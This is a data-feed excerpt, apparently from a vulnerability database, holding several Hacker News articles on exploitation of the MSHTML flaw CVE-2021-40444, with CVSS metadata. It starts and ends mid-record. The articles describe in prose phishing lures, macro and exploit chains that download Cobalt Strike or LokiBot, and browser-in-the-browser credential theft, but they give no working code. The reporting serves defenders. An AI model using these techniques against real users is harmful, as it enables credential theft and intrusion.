"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). \"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-17T10:25:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nA day after [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) and [Google](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) rolled out urgent security updates, Microsoft has [pushed software fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Sep>) as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an [actively exploited zero-day](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) in its MSHTML Platform that came to light last week. \n\nOf the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the [20 vulnerabilities](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.\n\nThe most important of the updates concerns a patch for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting \"the exploit uses logical flaws so the exploitation is perfectly reliable.\"\n\nAlso addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>), the elevation of privilege vulnerability is rated 7.8 in severity.\n\nOther flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure ([CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>)), Windows WLAN AutoConfig Service ([CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>)), Office ([CVE-2021-38659](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659>)), Visual Studio ([CVE-2021-36952](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952>)), and Word ([CVE-2021-38656](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656>)) as well as a memory corruption flaw in Windows Scripting Engine ([CVE-2021-26435](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435>))\n\nWhat's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671>), and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447>)), while [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975>) and [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639>) (CVSS scores: 7.8), both of which relate to an elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-09-01>)\n * [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-September/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T05:00:00", "type": "thn", "title": "Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", 